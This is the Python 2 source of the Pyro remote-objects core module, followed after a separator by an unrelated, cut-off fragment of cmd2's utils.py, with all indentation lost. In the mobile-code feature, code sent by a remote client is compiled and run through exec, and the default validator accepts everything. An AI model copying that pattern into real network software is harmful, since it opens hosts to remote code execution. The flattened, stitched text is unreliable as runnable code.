from types import UnboundMethodType, MethodType, BuiltinMethodType, TupleType, StringType, UnicodeType
if Pyro.util.supports_multithreading():
import threading
Log=Pyro.util.Log
def _checkInit(pyrotype="client"):
if not getattr(Pyro.config, Pyro.constants.CFGITEM_PYRO_INITIALIZED):
# If Pyro has not been initialized explicitly, do it automatically.
if pyrotype=="server":
initServer()
else:
initClient()
#############################################################################
#
# ObjBase - Server-side object implementation base class
# or master class with the actual object as delegate
#
# SynchronizedObjBase - Just the same, but with synchronized method
# calls (thread-safe).
#
#############################################################################
class ObjBase(object):
def __init__(self):
self.objectGUID=Pyro.util.getGUID()
self.delegate=None
self.lastUsed=time.time() # for later reaping unused objects
if Pyro.config.PYRO_MOBILE_CODE:
self.codeValidator=lambda n,m,a: 1 # always accept
def GUID(self):
return self.objectGUID
def setGUID(self, guid): # used with persistent name server
self.objectGUID = guid
def delegateTo(self,delegate):
self.delegate=delegate
def setPyroDaemon(self, daemon):
# This will usually introduce a cyclic reference between the
# object and the daemon. Use a weak ref if available.
# NOTE: if you correctly clean up the object (that is, disconnect it from the daemon)
# the cyclic reference is cleared correctly, and no problem occurs.
# NOTE: you have to make sure your original daemon object doesn't get garbage collected
# if you still want to use the objects! You have to keep a ref. to the daemon somewhere.
if daemon:
self.daemon=weakref.proxy(daemon)
else:
self.daemon=None
def setCodeValidator(self, v):
if not callable(v):
raise TypeError("codevalidator must be a callable object")
self.codeValidator=v
def getDaemon(self):
return self.daemon
def getLocalStorage(self):
return self.daemon.getLocalStorage()
def _gotReaped(self):
# Called when daemon reaps this object due to unaccessed time
# Override this method if needed; to act on this event
pass
def getProxy(self):
return self.daemon.getProxyForObj(self)
def getAttrProxy(self):
return self.daemon.getAttrProxyForObj(self)
def Pyro_dyncall(self, method, flags, args):
# update the timestamp
self.lastUsed=time.time()
# find the method in this object, and call it with the supplied args.
keywords={}
if flags & Pyro.constants.RIF_Keywords:
# reconstruct the varargs from a tuple like
# (a,b,(va1,va2,va3...),{kw1:?,...})
keywords=args[-1]
args=args[:-1]
if flags & Pyro.constants.RIF_Varargs:
# reconstruct the varargs from a tuple like (a,b,(va1,va2,va3...))
args=args[:-1]+args[-1]
if keywords and type(keywords.iterkeys().next()) is unicode and sys.platform!="cli":
# IronPython sends all strings as unicode, but apply() doesn't grok unicode keywords.
# So we need to rebuild the keywords dict with str keys...
keywords = dict([(str(k),v) for k,v in keywords.iteritems()])
# If the method is part of ObjBase, never call the delegate object because
# that object doesn't implement that method. If you don't check this,
# remote attributes won't work with delegates for instance, because the
# delegate object doesn't implement _r_xa. (remote_xxxattr)
if method in dir(ObjBase):
return getattr(self,method) (*args,**keywords)
else:
# try..except to deal with obsoleted string exceptions (raise "blahblah")
try :
return getattr(self.delegate or self,method) (*args,**keywords)
except :
exc_info = sys.exc_info()
try:
if type(exc_info[0]) == StringType :
if exc_info[1] == None :
raise Exception, exc_info[0], exc_info[2]
else :
raise Exception, "%s: %s" % (exc_info[0], exc_info[1]), exc_info[2]
else :
raise
finally:
del exc_info # delete frame to allow proper GC
# remote getattr/setattr support:
def _r_ha(self, attr):
try:
attr = getattr(self.delegate or self,attr)
if type(attr) in (UnboundMethodType, MethodType, BuiltinMethodType):
return 1 # method
except:
pass
return 2 # attribute
def _r_ga(self, attr):
return getattr(self.delegate or self, attr)
def _r_sa(self, attr, value):
setattr(self.delegate or self, attr, value)
# remote code downloading support (server downloads from client):
def remote_supply_code(self, name, module, sourceaddr):
# XXX this is nasty code, and also duplicated in protocol.py _retrieveCode()
if Pyro.config.PYRO_MOBILE_CODE and self.codeValidator(name,module,sourceaddr):
try:
imp.acquire_lock() # threadsafe imports
if name in sys.modules and getattr(sys.modules[name],'_PYRO_bytecode',None):
# already have this module, don't import again
# we checked for the _PYRO_bytecode attribute because that is only
# present when all loading code below completed successfully
return
Log.msg('ObjBase','loading supplied code: ',name,'from',str(sourceaddr))
if module[0:4]!=imp.get_magic():
# compile source code
code=compile(module,'<downloaded>','exec')
else:
# read bytecode from the client
code=marshal.loads(module[8:])
# make the module hierarchy and add all names to sys.modules
name=name.split('.')
path=''
mod=new.module("pyro-agent-context")
for m in name:
path+='.'+m
# use already loaded modules instead of overwriting them
real_path = path[1:]
if sys.modules.has_key(real_path):
mod = sys.modules[real_path]
else:
setattr(mod,m,new.module(path[1:]))
mod=getattr(mod,m)
sys.modules[path[1:]]=mod
# execute the module code in the right module.
exec code in mod.__dict__
# store the bytecode for possible later reference if we need to pass it on
mod.__dict__['_PYRO_bytecode'] = module
finally:
imp.release_lock()
else:
Log.warn('ObjBase','attempt to supply code denied: ',name,'from',str(sourceaddr))
raise PyroError('attempt to supply code denied')
# remote code retrieve support (client retrieves from server):
def remote_retrieve_code(self, name):
# XXX codeValidator: can we somehow get the client's address it is sent to?
# XXX this code is ugly. And duplicated in protocol.py remoteInvocation.
if Pyro.config.PYRO_MOBILE_CODE and self.codeValidator(name,None,None):
Log.msg("ObjBase","supplying code: ",name)
try:
importmodule=new.module("pyro-server-import")
try:
exec "import " + name in importmodule.__dict__
except ImportError:
Log.error("ObjBase","Client wanted a non-existing module:", name)
raise PyroError("Client wanted a non-existing module", name)
m=eval("importmodule."+name)
# try to load the module's compiled source, or the real .py source if that fails.
# note that the source code (.py) is opened with universal newline mode
(filebase,ext)=os.path.splitext(m.__file__)
if ext.startswith(".PY"):
exts = ( (".PYO","rb"), (".PYC","rb"), (".PY","rU") ) # uppercase
else:
exts = ( (".pyo","rb"), (".pyc","rb"), (".py","rU") ) # lowercase
for ext,mode in exts:
try:
m=open(filebase+ext, mode).read()
return m # supply the module to the client!
except:
pass
Log.error("ObjBase","cannot read module source code for module:", name)
raise PyroError("cannot read module source code")
finally:
del importmodule
else:
Log.error("ObjBase","attempt to retrieve code denied:", name)
raise PyroError("attempt to retrieve code denied")
class SynchronizedObjBase(ObjBase):
def __init__(self):
ObjBase.__init__(self)
self.synlock=Pyro.util.getLockObject()
def Pyro_dyncall(self, method, flags, args):
with self.synlock:
return ObjBase.Pyro_dyncall(self, method,flags,args)
# Use this class instead if you're using callback objects and you
# want to see local exceptions. (otherwise they go back to the calling server...)
class CallbackObjBase(ObjBase):
def __init__(self):
ObjBase.__init__(self)
def Pyro_dyncall(self, method, flags, args):
try:
return ObjBase.Pyro_dyncall(self,method,flags,args)
except Exception,x:
# catch all errors
Log.warn('CallbackObjBase','Exception in callback object: ',x)
raise PyroExceptionCapsule(x,str(x))
#############################################################################
#
# PyroURI - Pyro Universal Resource Identifier
#
# This class represents a Pyro URI (which consists of four parts,
# a protocol identifier, an IP address, a portnumber, and an object ID.
#
# The URI can be converted to a string representation (str converter).
# The URI can also be read back from such a string (reinitFromString).
# The URI can be initialised from its parts (init).
# The URI can be initialised from a string directly, if the init
# code detects a ':' and '/' in the host argument (which is then
# assumed to be a string URI, not a host name/ IP address).
#
#############################################################################
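# Illustrative sketch (address, port and object ID below are made-up values):
#   uri = PyroURI('PYRO://192.168.0.10:7766/1234567890abcdef')    # parse from a string
#   str(uri)    # -> 'PYRO://192.168.0.10:7766/1234567890abcdef'
#   uri = PyroURI('192.168.0.10', objectID='1234567890abcdef', port=7766, prtcol='PYRO')   # from parts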
class PyroURI(object):
def __init__(self,host,objectID=0,port=0,prtcol='PYRO'):
# if the 'host' arg is a PyroURI, copy contents
if isinstance(host, PyroURI):
self.init(host.address, host.objectID, host.port, host.protocol)
else:
# If the 'host' arg contains '://', assume it's an URI string.
if host.find('://')>0:
self.reinitFromString(host)
else:
if not objectID:
raise URIError('invalid URI format')
self.init(host, objectID, port, prtcol)
def __str__(self):
return self.protocol+'://'+self.address+':'+str(self.port)+'/'+self.objectID
def __repr__(self):
return '<PyroURI \''+str(self)+'\'>'
def __hash__(self):
# XXX this is handy but not safe. If the URI changes, the object will be in the wrong hash bucket.
return hash(str(self))
def __cmp__(self, o):
return cmp(str(self), str(o))
def clone(self):
return PyroURI(self)
def init(self,host,objectID,port=0,prtcol='PYRO'):
if '/' in host:
raise URIError('malformed hostname')
if Pyro.config.PYRO_DNS_URI:
self.address = host
else:
self.address=Pyro.protocol.getIPAddress(host)
if not self.address:
raise URIError('unknown host')
if port:
if type(port)==type(1):
self.port=port
else:
raise TypeError("port must be integer")
else:
self.port=Pyro.config.PYRO_PORT
self.protocol=prtcol
self.objectID=objectID
def reinitFromString(self,arg):
if arg.startswith('PYROLOC') or arg.startswith('PYRONAME'):
uri=processStringURI(arg)
self.init(uri.address,uri.objectID,uri.port,uri.protocol)
return
x=re.match(r'(?P<protocol>[^\s:/]+)://(?P<hostname>[^\s:]+):?(?P<port>\d+)?/(?P<id>\S*)',arg)
if x:
port=None
if x.group('port'):
port=int(x.group('port'))
self.init(x.group('hostname'), x.group('id'), port, x.group('protocol'))
return
Log.error('PyroURI','invalid URI format passed: '+arg)
raise URIError('invalid URI format')
def getProxy(self):
return DynamicProxy(self)
def getAttrProxy(self):
return DynamicProxyWithAttrs(self)
#
# This method takes a string representation of a Pyro URI
# and parses it. If it's a meta-protocol URI such as
# PYRONAME://.... it will do what is needed to make
# a regular PYRO:// URI out of it (resolve names etc).
#
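# Illustrative examples of the accepted forms (hosts, ports and object names are made up):
#   processStringURI('PYRONAME://nshost:9090/example.object')   # resolved through the name server
#   processStringURI('PYROLOC://objhost:7766/example.object')   # resolved later by the object's daemon
#   processStringURI('PYRO://objhost:7766/1234567890abcdef')    # already a plain Pyro URI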
def processStringURI(URI):
# PYRONAME(SSL)://[hostname[:port]/]objectname
x=re.match(r'(?P<protocol>PYRONAME|PYRONAMESSL)://(((?P<hostname>[^\s:]+):(?P<port>\d+)/)|((?P<onlyhostname>[^\s:]+)/))?(?P<name>\S*)',URI)
if x:
protocol=x.group('protocol')
if protocol=="PYRONAMESSL":
raise ProtocolError("NOT SUPPORTED YET: "+protocol) # XXX obviously, this should be implemented
hostname=x.group('hostname') or x.group('onlyhostname')
port=x.group('port')
name=x.group('name')
import Pyro.naming
loc=Pyro.naming.NameServerLocator()
if port:
port=int(port)
NS=loc.getNS(host=hostname,port=port)
return NS.resolve(name)
# PYROLOC(SSL)://hostname[:port]/objectname
x=re.match(r'(?P<protocol>PYROLOC|PYROLOCSSL)://(?P<hostname>[^\s:]+):?(?P<port>\d+)?/(?P<name>\S*)',URI)
if x:
protocol=x.group('protocol')
hostname=x.group('hostname')
port=x.group('port')
if port:
port=int(port)
else:
port=0
name=x.group('name')
return PyroURI(hostname,name,port,protocol)
if URI.startswith('PYROLOC') or URI.startswith('PYRONAME'):
# hmm should have matched above. Likely invalid.
raise URIError('invalid URI format')
# It's not a meta-protocol such as PYROLOC or PYRONAME,
# let the normal Pyro URI deal with it.
# (it can deal with regular PYRO: and PYROSSL: protocols)
return PyroURI(URI)
#############################################################################
#
# DynamicProxy - dynamic Pyro proxy
#
# Can be used by clients to invoke objects for which they have no
# precompiled proxy.
#
#############################################################################
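# Minimal client-side sketch (the registered object name and the method called are hypothetical):
#   import Pyro.core
#   Pyro.core.initClient()
#   proxy = Pyro.core.getProxyForURI('PYRONAME://example.object')
#   result = proxy.some_remote_method(1, 2)   # dispatched through _invokePYRO below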
def getProxyForURI(URI):
return DynamicProxy(URI)
def getAttrProxyForURI(URI):
return DynamicProxyWithAttrs(URI)
class _RemoteMethod(object):
# method call abstraction, adapted from Python's xmlrpclib
# it would be rather easy to add nested method calls, but
# that is not compatible with the way that Pyro's method
# calls are defined to work ( no nested calls )
def __init__(self, send, name):
self.__send = send
self.__name = name
def __call__(self, *args, **kwargs):
return self.__send(self.__name, args, kwargs)
class DynamicProxy(object):
def __init__(self, URI):
_checkInit() # init required
if type(URI) in (StringType,UnicodeType):
URI=processStringURI(URI)
self.URI = URI
self.objectID = URI.objectID
# Delay adapter binding to enable transporting of proxies.
# We just create an adapter, and don't connect it...
self.adapter = Pyro.protocol.getProtocolAdapter(self.URI.protocol)
# ---- don't forget to register local vars with DynamicProxyWithAttrs, see below
def __del__(self):
try:
self.adapter.release(nolog=1)
except (AttributeError, RuntimeError):
pass
def _setIdentification(self, ident):
self.adapter.setIdentification(ident)
def _setNewConnectionValidator(self, validator):
self.adapter.setNewConnectionValidator(validator)
def _setOneway(self, methods):
if type(methods) not in (type([]), type((0,))):
methods=(methods,)
self.adapter.setOneway(methods)
def _setTimeout(self,timeout):
self.adapter.setTimeout(timeout)
def _transferThread(self, newOwnerThread=None):
pass # dummy function to retain API compatibility with Pyro 3.7
def _release(self):
if self.adapter:
self.adapter.release()
def _local(self):
return self.URI._local()
def _islocal(self):
return self.URI._islocal()
def __copy__(self): # create copy of current proxy object
proxyCopy = DynamicProxy(self.URI)
proxyCopy.adapter.setIdentification(self.adapter.getIdentification(), munge=False) # copy identification info
proxyCopy._setTimeout(self.adapter.timeout)
proxyCopy._setOneway(self.adapter.onewayMethods)
proxyCopy._setNewConnectionValidator(self.adapter.getNewConnectionValidator())
return proxyCopy
def __deepcopy__(self, arg):
raise PyroError("cannot deepcopy a proxy")
def __getattr__(self, name):
if name in ("__getnewargs__","__getinitargs__"): # allows it to be safely pickled
raise AttributeError()
return _RemoteMethod(self._invokePYRO, name)
def __repr__(self):
return "<"+self.__class__.__name__+" for "+str(self.URI)+">"
def __str__(self):
return repr(self)
def __hash__(self):
# makes it possible to use this class as a key in a dict
return hash(self.objectID)
def __eq__(self,other):
# makes it possible to compare two proxies using objectID
return hasattr(other,"objectID") and self.objectID==other.objectID
def __ne__(self,other):
# makes it possible to compare two proxies using objectID
return not hasattr(other,"objectID") or self.objectID!=other.objectID
def __nonzero__(self):
return 1
def __coerce__(self,other):
# makes it possible to compare two proxies using objectID (cmp)
if hasattr(other,"objectID"):
return (self.objectID, other.objectID)
return None
def _invokePYRO(self, name, vargs, kargs):
if not self.adapter.connected():
# rebind here, don't do it from inside the remoteInvocation because deadlock will occur
self.adapter.bindToURI(self.URI)
return self.adapter.remoteInvocation(name, Pyro.constants.RIF_VarargsAndKeywords, vargs, kargs)
# Pickling support, otherwise pickle uses __getattr__:
def __getstate__(self):
# for pickling, return a non-connected copy of ourselves:
cpy = self.__copy__()
cpy._release()
return cpy.__dict__
def __setstate__(self, args):
# for pickling, to restore the pickled state
self.__dict__.update(args)
class DynamicProxyWithAttrs(DynamicProxy):
_local_attrs = ("_local_attrs","URI", "objectID", "adapter", "_attr_cache")
def __init__(self, URI):
self._attr_cache = {}
DynamicProxy.__init__(self, URI)
def _r_ga(self, attr, value=0):
if value:
return _RemoteMethod(self._invokePYRO, "_r_ga") (attr) # getattr
else:
return _RemoteMethod(self._invokePYRO, "_r_ha") (attr) # hasattr
def findattr(self, attr):
if attr in self._attr_cache.keys():
return self._attr_cache[attr]
# look it up and cache the value
self._attr_cache[attr] = self._r_ga(attr)
return self._attr_cache[attr]
def __copy__(self): # create copy of current proxy object
return DynamicProxyWithAttrs(self.URI)
def __setattr__(self, attr, value):
if attr in self._local_attrs:
self.__dict__[attr]=value
else:
result = self.findattr(attr)
if result==2: # attribute
return _RemoteMethod(self._invokePYRO, "_r_sa") (attr,value)
else:
raise AttributeError('not an attribute')
def __getattr__(self, attr):
# allows it to be safely pickled
if attr not in ("__getnewargs__","__getinitargs__", "__hash__","__eq__","__ne__") and attr not in self._local_attrs:
result=self.findattr(attr)
if result==1: # method
return _RemoteMethod(self._invokePYRO, attr)
elif result:
return self._r_ga(attr, 1)
raise AttributeError
#############################################################################
#
# Daemon - server-side Pyro daemon
#
# Accepts and dispatches incoming Pyro method calls.
#
#############################################################################
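# Minimal server-side sketch (MyObjBaseSubclass and the object name are hypothetical;
# requestLoop() is assumed to be inherited from Pyro.protocol.TCPServer, defined outside this module):
#   import Pyro.core
#   Pyro.core.initServer()
#   daemon = Pyro.core.Daemon()
#   uri = daemon.connect(MyObjBaseSubclass(), 'example.object')
#   daemon.requestLoop()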
# The pyro object that represents the daemon.
# The daemon is not directly remotely accessible, for security reasons.
class DaemonServant(ObjBase):
def __init__(self, daemon):
ObjBase.__init__(self)
self.daemon=weakref.proxy(daemon)
def getRegistered(self):
return self.daemon.getRegistered()
def ResolvePYROLOC(self, name):
return self.daemon.ResolvePYROLOC(name)
# The daemon itself:
class Daemon(Pyro.protocol.TCPServer, ObjBase):
def __init__(self,prtcol='PYRO',host=None,port=0,norange=0,publishhost=None):
ObjBase.__init__(self)
self.NameServer = None
self.connections=[]
_checkInit("server") # init required
self.setGUID(Pyro.constants.INTERNAL_DAEMON_GUID)
self.implementations={Pyro.constants.INTERNAL_DAEMON_GUID:(DaemonServant(self),'__PYRO_Internal_Daemon')}
self.persistentConnectedObjs=[] # guids
self.transientsCleanupAge=0
self.transientsMutex=Pyro.util.getLockObject()
self.nscallMutex=Pyro.util.getLockObject()
if host is None:
host=Pyro.config.PYRO_HOST
if publishhost is None:
publishhost=Pyro.config.PYRO_PUBLISHHOST
# Determine range scanning or random port allocation
if norange:
# Fixed or random port allocation
# If port is zero, OS will randomly assign, otherwise,
# attempt to use the provided port value
self.port = port
portrange = 1
else:
# Scanning port allocation
if port:
self.port = port
else:
self.port = Pyro.config.PYRO_PORT
portrange=Pyro.config.PYRO_PORT_RANGE
if not publishhost:
publishhost=host
errormsg=''
for i in range(portrange):
try:
Pyro.protocol.TCPServer.__init__(self, self.port, host, Pyro.config.PYRO_MULTITHREADED,prtcol)
if not self.port:
# If we bound to an OS provided port, report it
self.port = self.sock.getsockname()[1]
self.hostname = publishhost or Pyro.protocol.getHostname()
self.protocol = prtcol
self.adapter = Pyro.protocol.getProtocolAdapter(prtcol)
self.validateHostnameAndIP() # ignore any result message... it's in the log already.
return
except ProtocolError,msg:
errormsg=msg
self.port+=1
Log.error('Daemon','Couldn\'t start Pyro daemon: ' +str(errormsg))
raise DaemonError('Couldn\'t start Pyro daemon: ' +str(errormsg))
# to be called to stop all connections and shut down.
def shutdown(self, disconnect=False):
Pyro.protocol.TCPServer.shutdown(self)
if disconnect:
self.__disconnectObjects()
def __disconnectObjects(self):
# server shutting down, unregister all known objects in the NS
if self.NameServer and Pyro and Pyro.constants:
with self.nscallMutex:
if Pyro.constants.INTERNAL_DAEMON_GUID in self.implementations:
del self.implementations[Pyro.constants.INTERNAL_DAEMON_GUID]
if self.implementations:
Log.warn('Daemon','Shutting down but there are still',len(self.implementations),'objects connected - disconnecting them')
for guid in self.implementations.keys():
if guid not in self.persistentConnectedObjs:
(obj,name)=self.implementations[guid]
if name:
try:
self.NameServer.unregister(name)
except Exception,x:
Log.warn('Daemon','Error while unregistering object during shutdown:',x)
self.implementations={}
def __del__(self):
self.__disconnectObjects() # unregister objects
try:
del self.adapter
Pyro.protocol.TCPServer.__del__(self)
except (AttributeError, RuntimeError):
pass
def __str__(self):
return '<Pyro Daemon on '+self.hostname+':'+str(self.port)+'>'
def __getstate__(self):
raise PicklingError('no access to the daemon')
def validateHostnameAndIP(self):
# Checks if hostname is sensible. Returns None if it is, otherwise a message
# telling what's wrong if it isn't too serious. If things are really bad,
# expect an exception to be raised. Things are logged too.
if not self.hostname:
Log.error("Daemon","no hostname known")
raise socket.error("no hostname known for daemon")
if self.hostname!="localhost":
ip = Pyro.protocol.getIPAddress(self.hostname)
if ip is None:
Log.error("Daemon","no IP address known")
raise socket.error("no IP address known for daemon")
if not ip.startswith("127.0."):
return None # this is good!
# 127.0.x.x or 'localhost' is a warning situation!
msg="daemon bound on hostname that resolves to loopback address 127.0.x.x"
Log.warn("Daemon",msg)
Log.warn("Daemon","hostname="+self.hostname)
return msg
def useNameServer(self,NS):
self.NameServer=NS
def getNameServer(self):
return self.NameServer
def setTimeout(self, timeout):
self.adapter.setTimeout(timeout)
def setAllowedIdentifications(self, ids):
self.getNewConnectionValidator().setAllowedIdentifications(ids)
def setTransientsCleanupAge(self, secs):
self.transientsCleanupAge=secs
if self.threaded:
Log.msg('Daemon','creating Grim Reaper thread for transients, timeout=',secs)
reaper=threading.Thread(target=self._grimReaper)
reaper.setDaemon(1) # thread must exit at program termination.
reaper.start()
def _grimReaper(self):
# this runs in a thread.
while self.transientsCleanupAge>0:
time.sleep(self.transientsCleanupAge/5)
self.reapUnusedTransients()
def getProxyForObj(self, obj):
return DynamicProxy( PyroURI(self.hostname,
obj.GUID(), prtcol=self.protocol, port=self.port) )
def getAttrProxyForObj(self, obj):
return DynamicProxyWithAttrs( PyroURI(self.hostname,
obj.GUID(), prtcol=self.protocol, port=self.port) )
def connectPersistent(self, obj, name=None):
# when a persistent entry is found in the NS, that URI is
# used instead of the supplied one, if the address matches.
if name and self.NameServer:
with self.nscallMutex:
try:
newURI = PyroURI(self.hostname, obj.GUID(), prtcol=self.protocol, port=self.port)
URI=self.NameServer.resolve(name)
if (URI.protocol,URI.address,URI.port)==(newURI.protocol,newURI.address,newURI.port):
# reuse the previous object ID
obj.setGUID(URI.objectID)
# enter the (object,name) in the known impl. dictionary
self.implementations[obj.GUID()]=(obj,name)
self.persistentConnectedObjs.append(obj.GUID())
obj.setPyroDaemon(self)
return URI
else:
# name exists, but address etc. is wrong. Remove it.
						# then continue so it will be re-registered.
try: self.NameServer.unregister(name)
except NamingError: pass
except NamingError:
pass
# Register normally.
self.persistentConnectedObjs.append(obj.GUID())
return self.connect(obj, name)
def connect(self, obj, name=None):
URI = PyroURI(self.hostname, obj.GUID(), prtcol=self.protocol, port=self.port)
# if not transient, register the object with the NS
if name:
with self.nscallMutex:
if self.NameServer:
self.NameServer.register(name, URI)
else:
Log.warn('Daemon','connecting object without name server specified:',name)
# enter the (object,name) in the known implementations dictionary
self.implementations[obj.GUID()]=(obj,name)
obj.setPyroDaemon(self)
return URI
def disconnect(self,obj): # obj can be either the object that was registered, or its uid
try:
if isinstance(obj,Pyro.core.ObjBase):
obj_uid=obj.GUID()
else:
obj_uid=str(obj)
if obj_uid==Pyro.constants.INTERNAL_DAEMON_GUID:
return # never allow to remove ourselves from the registry
if self.NameServer and self.implementations[obj_uid][1]:
with self.nscallMutex:
# only unregister with NS if it had a name (was not transient)
self.NameServer.unregister(self.implementations[obj_uid][1])
del self.implementations[obj_uid]
if obj_uid in self.persistentConnectedObjs:
self.persistentConnectedObjs.remove(obj_uid)
			# XXX Clean up connections/threads to this object?
			# Can't be done, because a thread/socket is not associated with a single object.
finally:
if isinstance(obj,Pyro.core.ObjBase):
obj.setPyroDaemon(None)
def getRegistered(self):
r={}
for guid in self.implementations.keys():
r[guid]=self.implementations[guid][1] # keep only the names
return r
def handleInvocation(self, conn): # overridden from TCPServer
# called in both single- and multithreaded mode
self.getLocalStorage().caller=conn
self.getAdapter().handleInvocation(self, conn)
self.reapUnusedTransients()
def reapUnusedTransients(self):
if not self.transientsCleanupAge: return
now=time.time()
with self.transientsMutex:
for (obj,name) in self.implementations.values()[:]: # use copy of list
if not name:
# object is transient, reap it if timeout requires so.
if (now-obj.lastUsed)>self.transientsCleanupAge:
self.disconnect(obj)
obj._gotReaped()
def handleError(self,conn,onewaycall=False): # overridden from TCPServer
try:
(exc_type, exc_value, exc_trb) = sys.exc_info()
if exc_type==ProtocolError:
# Problem with the communication protocol, shut down the connection
# XXX is shutting down what we want???
				Log.error('Daemon','protocol error occurred:',exc_value)
Log.error('Daemon','Due to network error: shutting down connection with',conn)
self.removeConnection(conn)
else:
exclist = Pyro.util.formatTraceback(exc_type, exc_value, exc_trb)
out =''.join(exclist)
Log.warn('Daemon', 'Exception during processing of request from',
conn,' type',exc_type,
'\n--- traceback of this exception follows:\n',
out,'\n--- end of traceback')
if exc_type==PyroExceptionCapsule:
sys.stdout.flush()
# This is a capsuled exception, used with callback objects.
# That means we are actually the daemon on the client.
# Return the error to the other side and raise exception locally once more.
# (with a normal exception, it is not raised locally again!)
# only send the exception object if it's not a oneway call.
if not onewaycall:
self.adapter.returnException(conn,exc_value.excObj,0,exclist) # don't shutdown
exc_value.raiseEx()
else:
# normal exception, only return exception object if it's not a oneway call
if not onewaycall:
self.adapter.returnException(conn,exc_value,0,exclist) # don't shutdown connection
finally:
# clean up circular references to traceback info to allow proper GC
del exc_type, exc_value, exc_trb
def getAdapter(self):
# overridden from TCPServer
return self.adapter
def getLocalObject(self, guid):
# return a local object registered with the given guid
return self.implementations[guid][0]
def getLocalObjectForProxy(self, proxy):
# return a local object registered with the guid to which the given proxy points
return self.implementations[proxy.objectID][0]
def ResolvePYROLOC(self, name):
# this gets called from the protocol adapter when
# it wants the daemon to resolve a local object name (PYROLOC: protocol)
Log.msg('Daemon','resolving PYROLOC name: ',name)
for o in self.implementations.keys():
if self.implementations[o][1]==name:
return o
raise NamingError('no object found by this name',name)
#############################################################################
#
# Client/Server Init code
#
#############################################################################
# Has init been performed already?
_init_server_done=0
_init_client_done=0
_init_generic_done=0
def _initGeneric_pre():
global _init_generic_done
if _init_generic_done:
return
if Pyro.config.PYRO_TRACELEVEL == 0: return
try:
out='\n'+'-'*60+' NEW SESSION\n'+time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))+ \
' Pyro Initializing, version '+Pyro.constants.VERSION+'\n'
Log.raw(out)
except IOError,e:
sys.stderr.write('PYRO: Can\'t write the tracefile '+Pyro.config.PYRO_LOGFILE+'\n'+str(e))
def _initGeneric_post():
global _init_generic_done
setattr(Pyro.config, Pyro.constants.CFGITEM_PYRO_INITIALIZED,1)
if Pyro.config.PYRO_TRACELEVEL == 0: return
try:
if not _init_generic_done:
out='Configuration settings are as follows:\n'
for item in dir(Pyro.config):
if item[0:4] =='PYRO':
out+=item+' = '+str(Pyro.config.__dict__[item])+'\n'
Log.raw(out)
Log.raw('Init done.\n'+'-'*70+'\n')
except IOError:
pass
_init_generic_done=1
def initClient(banner=0):
global _init_client_done
if _init_client_done: return
_initGeneric_pre()
if Pyro.config.PYRO_TRACELEVEL >0: Log.raw('This is initClient.\n')
Pyro.config.finalizeConfig_Client()
_initGeneric_post()
if banner:
print 'Pyro Client Initialized. Using Pyro V'+Pyro.constants.VERSION
_init_client_done=1
def initServer(banner=0, storageCheck=1):
global _init_server_done
if _init_server_done: return
_initGeneric_pre()
if Pyro.config.PYRO_TRACELEVEL >0: Log.raw('This is initServer.\n')
Pyro.config.finalizeConfig_Server(storageCheck=storageCheck)
_initGeneric_post()
if banner:
print 'Pyro Server Initialized. Using Pyro V'+Pyro.constants.VERSION
_init_server_done=1
if __name__=="__main__":
print "Pyro version:",Pyro.constants.VERSION
|
utils.py
|
# coding=utf-8
"""Shared utility functions"""
import argparse
import collections
import functools
import glob
import inspect
import itertools
import os
import re
import subprocess
import sys
import threading
import unicodedata
from enum import (
Enum,
)
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
Iterable,
List,
Optional,
TextIO,
Type,
TypeVar,
Union,
cast,
)
from . import (
constants,
)
from .argparse_custom import (
ChoicesProviderFunc,
CompleterFunc,
)
if TYPE_CHECKING: # pragma: no cover
import cmd2 # noqa: F401
PopenTextIO = subprocess.Popen[bytes]
else:
PopenTextIO = subprocess.Popen
_T = TypeVar('_T')
def is_quoted(arg: str) -> bool:
"""
Checks if a string is quoted
:param arg: the string being checked for quotes
:return: True if a string is quoted
"""
return len(arg) > 1 and arg[0] == arg[-1] and arg[0] in constants.QUOTES
def quote_string(arg: str) -> str:
"""Quote a string"""
if '"' in arg:
quote = "'"
else:
quote = '"'
return quote + arg + quote
def quote_string_if_needed(arg: str) -> str:
"""Quote a string if it contains spaces and isn't already quoted"""
if is_quoted(arg) or ' ' not in arg:
return arg
return quote_string(arg)
def strip_quotes(arg: str) -> str:
"""Strip outer quotes from a string.
Applies to both single and double quotes.
:param arg: string to strip outer quotes from
:return: same string with potentially outer quotes stripped
"""
if is_quoted(arg):
arg = arg[1:-1]
return arg
def str_to_bool(val: str) -> bool:
"""Converts a string to a boolean based on its value.
:param val: string being converted
:return: boolean value expressed in the string
:raises: ValueError if the string does not contain a value corresponding to a boolean value
"""
if isinstance(val, str):
if val.capitalize() == str(True):
return True
elif val.capitalize() == str(False):
return False
raise ValueError("must be True or False (case-insensitive)")
class Settable:
"""Used to configure an attribute to be settable via the set command in the CLI"""
def __init__(
self,
name: str,
val_type: Union[Type[Any], Callable[[Any], Any]],
description: str,
settable_object: object,
*,
settable_attrib_name: Optional[str] = None,
onchange_cb: Optional[Callable[[str, _T, _T], Any]] = None,
choices: Optional[Iterable[Any]] = None,
choices_provider: Optional[ChoicesProviderFunc] = None,
completer: Optional[CompleterFunc] = None,
) -> None:
"""
Settable Initializer
:param name: name of the instance attribute being made settable
:param val_type: callable used to cast the string value from the command line into its proper type and
even validate its value. Setting this to bool provides tab completion for true/false and
validation using str_to_bool(). The val_type function should raise an exception if it fails.
This exception will be caught and printed by Cmd.do_set().
:param description: string describing this setting
:param settable_object: object to which the instance attribute belongs (e.g. self)
:param settable_attrib_name: name which displays to the user in the output of the set command.
Defaults to `name` if not specified.
:param onchange_cb: optional function or method to call when the value of this settable is altered
by the set command. (e.g. onchange_cb=self.debug_changed)
Cmd.do_set() passes the following 3 arguments to onchange_cb:
param_name: str - name of the changed parameter
old_value: Any - the value before being changed
new_value: Any - the value after being changed
The following optional settings provide tab completion for a parameter's values. They correspond to the
same settings in argparse-based tab completion. A maximum of one of these should be provided.
:param choices: iterable of accepted values
:param choices_provider: function that provides choices for this argument
:param completer: tab completion function that provides choices for this argument
"""
if val_type == bool:
def get_bool_choices(_) -> List[str]: # type: ignore[no-untyped-def]
"""Used to tab complete lowercase boolean values"""
return ['true', 'false']
val_type = str_to_bool
choices_provider = cast(ChoicesProviderFunc, get_bool_choices)
self.name = name
self.val_type = val_type
self.description = description
self.settable_obj = settable_object
self.settable_attrib_name = settable_attrib_name if settable_attrib_name is not None else name
self.onchange_cb = onchange_cb
self.choices = choices
self.choices_provider = choices_provider
self.completer = completer
def get_value(self) -> Any:
"""
Get the value of the settable attribute
:return:
"""
return getattr(self.settable_obj, self.settable_attrib_name)
